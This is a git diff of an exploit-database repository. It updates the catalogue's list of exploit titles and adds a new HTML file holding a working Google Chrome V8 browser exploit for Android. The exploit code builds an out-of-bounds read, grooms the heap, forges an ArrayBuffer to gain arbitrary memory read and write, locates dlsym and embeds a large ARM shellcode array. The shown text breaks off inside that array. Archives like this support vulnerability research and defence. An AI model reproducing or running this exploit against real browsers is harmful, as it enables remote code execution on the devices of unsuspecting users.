diff --git a/files.csv b/files.csv
index b64b3162c..fe6e0acd0 100644
--- a/files.csv
+++ b/files.csv
@@ -6321,7 +6321,7 @@ id,file,description,date,author,platform,type,port
 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
 9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
-9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,lin_x86-64,local,0
+9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0
 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0
 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
 9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
@@ -9052,6 +9052,7 @@ id,file,description,date,author,platform,type,port
 42160,platforms/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
+42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9687,7 +9688,7 @@ id,file,description,date,author,platform,type,port
 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53
 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit",2007-03-23,"Jon Hart",multiple,remote,0
 3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143
-3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21
+3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21
 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0
 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0
 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - (PASS) Remote Exploit",2007-03-26,"Winny Thomas",windows,remote,21
@@ -15596,6 +15597,8 @@ id,file,description,date,author,platform,type,port
 42158,platforms/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote,0
 42159,platforms/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote,0
 42165,platforms/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote,0
+42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
+42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37998,3 +38001,5 @@ id,file,description,date,author,platform,type,port
 42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0
 42166,platforms/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps,0
 42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0
+42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
+42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0
diff --git a/platforms/android/remote/42175.html b/platforms/android/remote/42175.html
new file mode 100755
index 000000000..2a83ff8c2
--- /dev/null
+++ b/platforms/android/remote/42175.html
@@ -0,0 +1,662 @@
+<html>
+// Source: https://github.com/secmob/pwnfest2016/
+<script>
+function exploit(){
+
+function to_hex(num){
+    return (num>>>0).toString(16);
+}
+function intarray_to_double(int_arr){
+    var uBuf = new Uint32Array(2);
+    var dBuf = new Float64Array(uBuf.buffer);
+        uBuf[0]=int_arr[0];
+        uBuf[1]=int_arr[1];
+    return dBuf[0];
+}
+
+function str_to_double(str){//leng of str must be 8
+    var dBuf = new Float64Array(1);
+    var u8Buf = new Uint8Array(dBuf.buffer);
+    for(var i=0;i<str.length;i++){
+        u8Buf[i] = str.charCodeAt(i);
+    }
+    return dBuf[0];
+}
+function double_to_array(value){
+    var uBuf = new Uint32Array(2);
+    var dBuf = new Float64Array(uBuf.buffer);
+    dBuf[0]=value;
+    return uBuf;
+}
+
+function gc(){
+    for(var i=0;i<0x100000/16;i++){
+        new String;
+    }
+}
+function getHiddenValue(){
+    var obj = {};
+    var oob = "/re/";
+    //oob = oob.replace("re","*".repeat(0x2000));
+    oob = oob.replace("re","*".repeat(0x100000));
+    var str =  'class x extends Array{'+oob+"}";
+    var fun = eval(str);
+    Object.assign(obj,fun);
+    return obj;
+}
+var obWin;
+function makeOobString(){
+    var hiddenValue = getHiddenValue();
+    var magicStr = "bbbb";
+    var arr=[];
+    var str =  'class x extends Array{}';
+    for(var i=0;i<str.length;i++){
+        arr[i]=str.charCodeAt(i);
+    }
+    var ob = new Array(0x200);
+    ob.fill(0x31313131);
+    gc();
+    gc();
+    str=String.fromCharCode.apply(null,arr);
+    ob=ob.concat(0x32323232);
+    var fun = eval(str); 
+    ob[2]=str;
+    ob[3]=ob;
+    Object.assign(fun,hiddenValue);
+    var oobString = fun.toString();
+    gc();
+    gc();
+    print("begin search");
+    var subStr = oobString.substr(0,0x8000);
+    var pos = subStr.indexOf(magicStr);
+    print("end search");
+    if(pos==-1){
+        print("find magic failed");
+        postMessage(false);
+        self.close();
+        print("unpossible");
+        throw "error";
+    }else{
+        print("find magic at "+pos);
+
+    }
+    oobString = oobString.substr(pos,ob.length*4);
+    obWin=ob;
+    return oobString;
+}
+var oobString = makeOobString();
+print("get oob string successfully");
+function print(){
+    console.log.apply(null,arguments);
+    /*document.write('<p >');
+    document.write.apply(document,arguments);
+    document.write("<p>");*/
+}
+function str2arr(str,len){//len must be multile of 4
+    if(len===undefined)
+        len = str.length;
+    var u8a = new Uint8Array(len);
+    for(var i=0;i<len;i++){
+        u8a[i] = str.charCodeAt(i);
+    }
+    return new Uint32Array(u8a.buffer);
+}
+function pArrayInHex(arr){
+    var result="<p style='font-size:8px'>";
+    for(var i=0;i<arr.length;i++){
+        result+=(arr[i]+0x100000000).toString(16).substr(-8);
+        result+=" ";
+        if(i%8==7)
+            result+="<p style='font-size:8px'>";
+    }
+    result+="<p>";
+    print(result);
+    //alert(result);
+    return result;
+}
+function pStrInHex(str){
+    //var result="<p style='font-size:8px'>";
+    var result="\n";
+    for(var i=0;i<str.length;i++){
+        var code = str.charCodeAt(i);
+        result+=(code+0x100).toString(16).substr(-2);
+        if(i%4==3)
+            result+=" ";
+        if(i%32==31)
+           // result+="<p style='font-size:8px'>";
+           result+="\n";
+    }
+   // result+="<p>";
+    result+="\n";
+    print(result);
+    return result;
+}
+function getObjAddr(obj){
+    obWin[0]=obj;
+    var value2= ((str2arr(oobString,4))[0]);
+    return value2>>>0;
+}
+
+var getObj24BitsAddr = function(){
+    var smi=0;
+    var code = 0;
+    var i=0;
+    //don't allocate heap object
+    function getAddr(obj){
+        obWin[0]=obj;
+        value=0;
+        code = 0;
+        i=0;
+        for(i=2;i>=0;i--){
+            code = oobString.charCodeAt(i);
+            value = code+value*256;
+        }
+        return value;
+    }
+    return getAddr;
+}();
+
+
+var lengthInOldSpace = 0xfffffffc;
+var abarr=new Array(800);
+function sprayVM(){
+    var i=0;
+    var j=0;
+    try{
+        for(i=0;i<20;i++){
+            var u8 = new Uint8Array(0x10000000-0x500);
+            abarr[i]=u8;
+        }
+    }catch(e){}
+    try{
+        for(j=0;j<100;j++){
+            var u8 = new Uint8Array(0x8000000-0x500);
+            abarr[i+j]=u8;
+        }
+    }catch(e){}
+    print("allocate "+i+" 256M "+j+" 16M ")
+    function getRandomInt(min, max) {
+        min = Math.ceil(min);
+        max = Math.floor(max);
+        return Math.floor(Math.random() * (max - min)) + min;
+    }
+    delete abarr[getRandomInt(0,i)];
+}
+
+
+function getNewSpaceAddrs(){
+    /*var kMaxRegularHeapObjectSize =523776;// 507136;
+    var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
+    str+="%";*/
+    var objsInNewSpace = new Array(80);
+    for(var i=0;i<objsInNewSpace.length;i++){
+        //var xx=escape(str);
+        var xx = new Array(0x70000/4);
+        objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;
+        //使newspace更离散
+        new Uint8Array(0x100000-0x500);
+        new Uint8Array(0x100000-0x500);
+    }
+    function compareNumbers(a, b) {
+      return a - b;
+    }
+    objsInNewSpace = Array.from(new Set(objsInNewSpace));
+    objsInNewSpace = objsInNewSpace.sort(compareNumbers);
+    return objsInNewSpace;
+}
+
+
+print("begin get new space address");
+var objsInNewSpace = getNewSpaceAddrs();
+while(objsInNewSpace.length<16){
+    objsInNewSpace = getNewSpaceAddrs();
+    print("new space addresses");
+    pArrayInHex(objsInNewSpace);
+}
+
+try{
+sprayVM();
+}catch(e){}
+
+var selectedTrunk = 0;
+var selectedStr = "";
+function bruteForceFengShui(){
+    var huge_str = "x".repeat(0x100000-0x9000);//-0x9000
+    huge_str +="%";
+    var hold = new Array(100);
+    //var holdaddress = new Array(100);
+    for(var i=0;;i++){
+        var large = escape(huge_str);
+        var addr = getObjAddr(large);
+        //console.log(addr.toString(16) + " "+i);
+        if(i<hold.length){
+            hold[i]=large;
+            //holdaddress[i]=addr;
+        }
+        addr=(addr&0xfff00000)>>>0;
+        addr = addr-0x100000;
+        if(objsInNewSpace.indexOf(addr)!=-1){
+            selectedTrunk = addr;
+            selectedStr = large;
+            abarr.fill(1);
+            hold.fill(1);
+            //holdaddress.fill(1);
+            break;
+        }
+        if(i===150){
+            /*i=0;
+            print("tried 200 times");
+            abarr.fill(1);
+            try{
+            sprayVM();
+            }catch(e){};*/
+            postMessage(false);
+            close();
+            throw "exceed limits";
+        }
+    }
+}
+bruteForceFengShui();
+//to avoid allocate memory latter, initilize here
+var nextTrunk = selectedTrunk + 0x100000;
+
+//生成一块足够大的可读写内存
+var huge_str = "eval('');";
+//8000不能太大，太大会使new_space增大
+for(var i=0;i<8000;i++) huge_str += 'a.a;';
+huge_str += "return 10;";
+var huge_func = new Function('a',huge_str);
+huge_func({});
+
+function fillNewSpace(origObj){
+    //first object in new space at 0x8100, new spaces layout
+    //0x40000
+    //0x37f00
+    //.....
+    //0x40000
+    var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25
+    var gap = gap+"%";
+    //flat gap
+    gap.substr(0,100);
+    var fillstr = "%20a".repeat((0x40000-12)/4);
+    fillstr = escape(fillstr);
+    var addr=0;
+    for(var i=0;i<0x100;i++){
+        addr = getObj24BitsAddr(origObj);
+        if((addr&0xfffff)===0x8101)
+            origObj=escape(gap);
+        else
+            origObj=unescape(fillstr);
+    }
+}
+
+function findNewSpace(){
+    var kMaxRegularHeapObjectSize =523776;// 507136;
+    var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
+    str+="%";
+    for(var i=0;;i++){
+        var xx=escape(str);
+        var straddr = getObjAddr(xx);
+        addr=(straddr&0xfff00000)>>>0;
+        if(addr===selectedTrunk){
+            print("good state "+straddr.toString(16));
+            break;
+        }
+    }
+}
+
+function myencode(str){
+    var arr = [];
+    for(var i=0;i<str.length;i++){
+        if(i%2==1)
+            arr.push(str.charCodeAt(i));
+        else{
+            arr.push(37);//%
+            var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);
+            arr.push(hexstr.charCodeAt(0));
+            arr.push(hexstr.charCodeAt(1));
+        }
+    }
+    return String.fromCharCode.apply(null,arr);
+}
+
+var dArray = [];
+var index = (0x8100-36)*2;
+for(var i=0;i<0x20000/8;i++){
+        dArray[i]=str_to_double("%03x%03x");
+}
+
+var occulen = 0;
+var i = 0;
+var savedChunk = new Uint8Array(0x8100);
+var hiddenValue = getHiddenValue();
+var arr=[];
+fillNewSpace(new String);
+findNewSpace();
+var classStr =  'class x extends Array{}';
+for(var i=0;i<classStr.length;i++){
+    arr[i]=classStr.charCodeAt(i);
+}
+var magicStr = String.fromCharCode(0x86,0x24);
+classStr=String.fromCharCode.apply(null,arr);
+var ab = new ArrayBuffer(0x1243);
+var fun = eval(classStr); 
+Object.assign(fun,hiddenValue);
+var oobStr = fun.toString();
+
+/*(gdb) x/20xw 0x5600c45c   array buffer layout
+ * 0x5600c45c:  0x4b009a9d  0x41008125  0x41008125  0x00000020
+ * 0x5600c46c:  0x09fda368  0x00000004  0x00000000  0x00000000
+ */
+//overwrite huge string as array buffer
+var abLengthIndex = oobStr.indexOf(magicStr);
+var strArrayBuffer = oobStr.substr(abLengthIndex-12,32);
+//replace the byteLength
+var LengthAddr = getObjAddr(lengthInOldSpace);
+var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);
+var strBase = "\x00\x00\x00\x00";
+strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);
+strArrayBuffer = myencode(strArrayBuffer);
+for(var i=0;i<strArrayBuffer.length/8;i++){
+    var d = strArrayBuffer.substr(i*8,8);
+    dArray[index/8+i] = str_to_double(d);
+}
+
+var classStrAddr = getObjAddr(classStr)>>>0;
+//set read position
+var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head
+//length control the length of unscaped string, generated string has 12 bytes head
+//left 0x1000*2 bytes to avoid gc
+var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);
+
+//save the the chunk head to be corrupted
+var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;
+var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);
+for(var i =0;i<savedThunkStr.length;i++){
+    savedChunk[i] = savedThunkStr.charCodeAt(i);
+}
+
+var pos1=new String;
+var pos1addr = getObj24BitsAddr(pos1)-1;
+
+//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray 
+occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);
+//minus the length of double array
+if(occulen<0x40000+16+8)
+    throw "no enough room";
+occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray
+if(occulen%4!==0)
+    throw "length don't align";
+var arrocc=new Array((occulen/4)); 
+//set unescape write position
+var occDoubleArray = dArray.concat();
+
+var b=unescape(subOobStr);
+//restore the corrupted chunk head
+var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);
+for(var i=0;i<savedChunk.length;i++){
+    u8[i] = savedChunk[i];
+}
+
+print("long string allocated at "+classStrAddr.toString(16));
+if(typeof(selectedStr)==="string"){
+    print("overwrite failed");
+    postMessage(false);
+    close();
+    return;
+    //throw "overwrite failed";
+}
+var fakeab = selectedStr;
+print("faked array buffer byte length is "+fakeab.byteLength.toString(16));
+var globaldv = new Uint32Array(fakeab);
+
+function read_uint32(from_address){
+    var u32 =  globaldv[(from_address/4)>>>0];
+    return u32>>>0;
+}
+
+
+function read_uint8(from_address){
+    from_address = from_address>>>0;
+    var index = (from_address/4)>>>0;
+    var mask = from_address%4;
+    var u32 =  globaldv[index];
+    u32 = u32<<8*(3-mask);
+    return u32>>>24;
+}
+
+function read_uint32_unalign(from_address){
+    var u32 = 0;
+    for(var i=3;i>=0;i--){
+        var u8 = read_uint8(from_address+i);
+        u32 = u32*0x100+u8;
+    }
+    return u32>>>0;
+}
+
+//rw to execute
+//get function point of v8::internal::Accessors::ReconfigureToDataProperty
+function getFixedFunctionPoint(fakeab){
+    var FunctionAddress = getObjAddr(Function);
+    var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);
+    var map = u32[0];
+    u32 = new Uint32Array(fakeab,map-1,0x1000);
+    //instance descriptors
+    var descriptors = u32[7];
+    u32 = new Uint32Array(fakeab,descriptors-1,0x1000);
+    var lengthAccessorInfo = u32[6];
+    u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);
+    var setterForeign = u32[4];
+    u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);
+    var functionPoint = u32[1];
+    return functionPoint-1;
+}
+
+var funPoint = getFixedFunctionPoint(fakeab);
+print("ReconfigureToDataProperty at"+funPoint.toString(16));
+var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval
+
+var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000
+print("chrome.apk base at "+point.toString(16));
+
+function find(startAddr,len,pattern){
+    for(var i=0; i<(len-pattern.length); i++ ) {
+        for(var j=0;j<pattern.length;j++){
+            var temp = read_uint8(startAddr+i+j);
+            //print(temp.toString(16));
+            if(temp!=pattern[j]) break;
+        }
+        if(j==pattern.length) return startAddr+i;
+    }
+    print("find failed");
+}
+var pattern_position=find(point,0x10000000,pattern);
+
+print("find pattern at "+to_hex(pattern_position));
+
+
+
+
+
+function get_dest_from_blx(addr) {
+    var val = read_uint32_unalign(addr);
+    var s = (val & 0x400) >> 10;
+    var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
+    var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
+    var i10h = val & 0x3ff;
+    var i10l = (val & 0x7fe0000) >> 17;
+    var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
+    return ((addr + 4) & ~3) + off;
+}
+
+function backup_original_code(start_address){
+    var backup_arr = [];
+    set_access_address(start_address);
+    var u8arr=new Uint8Array(faked_ab);
+    for(var i=0;i<shellcode.length+4096;i++){
+        backup_arr[i]=u8arr[i];
+    }
+    return backup_arr;
+}
+
+function restore_original_code(start_address,backup_arr){
+    set_access_address(start_address);
+    var u8arr=new Uint8Array(faked_ab);
+    for(var i=0;i<shellcode.length+4096;i++){
+        u8arr[i]=backup_arr[i];
+    }
+}
+
+
+huge_func({});
+print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4)));
+var dlsym_addr = get_dest_from_blx(pattern_position-4);
+print("dlsym address is "+to_hex(dlsym_addr));
+var huge_func_address = getObjAddr(huge_func)-1;
+print("huge func address is "+to_hex(huge_func_address));
+for(var i=0;i<20;i++){
+    print(to_hex(read_uint32(huge_func_address+i*4)));
+}
+var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4
+print("huge func code entry is "+to_hex(huge_func_code_entry));
+print(to_hex(read_uint32(huge_func_code_entry)));
+
+//var so_str= "";
+var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,